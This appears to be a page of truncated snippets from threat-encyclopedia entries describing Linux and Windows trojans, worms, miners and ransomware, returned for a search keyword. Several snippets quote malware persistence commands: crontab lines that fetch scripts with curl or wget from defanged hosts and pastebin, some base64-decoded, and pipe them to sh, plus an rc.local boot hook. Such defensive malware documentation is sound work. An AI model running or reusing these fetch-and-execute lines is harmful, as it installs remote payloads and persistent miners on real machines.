Keyword: usojan.sh.hadglider.d
\shell HKEY_CURRENT_USER\a01\shell\ open HKEY_CURRENT_USER\a01\shell\ open\command HKEY_CURRENT_USER\a01\shell\ runas HKEY_CURRENT_USER\a01\shell\ runas\command HKEY_CURRENT_USER\SH HKEY_CURRENT_USER\SH
Modifications This Trojan modifies the following file(s): /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot /var/spool/mail/{user} - contents replaced with "0" string /var/log/wtmp -
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
/tmp/.vd/sslm.tgz min* {Current Directory}/min* /tmp/min* Process Termination This Trojan terminates the following processes if found running in the affected system's memory: rand rx rd tsm tsm2 haiduc a sparky sh
the server SH <command> - Executes a command ISH <command> - SH, interactive, sends to channel SHD <command> - Executes a pseudo-daemonized command INSTALL <http
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
* * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh Path: /etc/crontab Schedule:
This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
.nwf .nwm .nwp .nws .nwv .nx^d .nx__ .nx1 .nx2 .nxc .nxg .nxl .ny .nyf .nzb .o .oa2 .oa3 .oab .oad .oam .oar .oas .ob! .obd .obi .obj .obk .obml .obp .obr .obs .obt .obw .obx .obz .oc3 .oc4 .oc5 .oca
.nws .nx^d .nx__ .nx1 .nx2 .nxc .nxg .nxl .ny .nyf .nzb .o .oa2 .oa3 .oab .oad .oam .oar .oas .obd .obj .obk .obml .obp .obr .obt .obx .obz .oca .occ .ocd .ocdc .oce .ocr .ocs .ocx .od .oda .odb .odc
This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive
'/var/spool/cron/crontabs/'"$USER" Schedule: Every 15 minutes Command: "*/15 * * * * ((wget -q -O- https://pastebin.com/raw/{BLOCKED}tb || curl -fsSL https://pastebin.com/raw/{BLOCKED}tb) | base64 -d) | sh" > cron.d 2>&1
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
/var/spool/cron/root Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh mine.moneropool.com xmr.crypto-pool.fr monerohash.com xmrpool.eu pool.noobxmr.com pool.minexmr.cn xmr.poolto.be
* * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh It blocks all outgoing SSH connections on the following ports: 3333 5555 7777 9999 14444 It modifies the system's HOSTS file to prevent users
\01CAC802\D (Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000, XP, and Server 2003, or C:\Users\{user name}
-fsSL http://lsd.{BLOCKED}ten.org||wget -q -O- http://lsd.{BLOCKED}ten.org)|sh Path: /var/spool/cron/root Schedule: Every 15 minutes Command: */15 * * * * (curl -fsSL http://lsd.{BLOCKED}ten.org||wget -q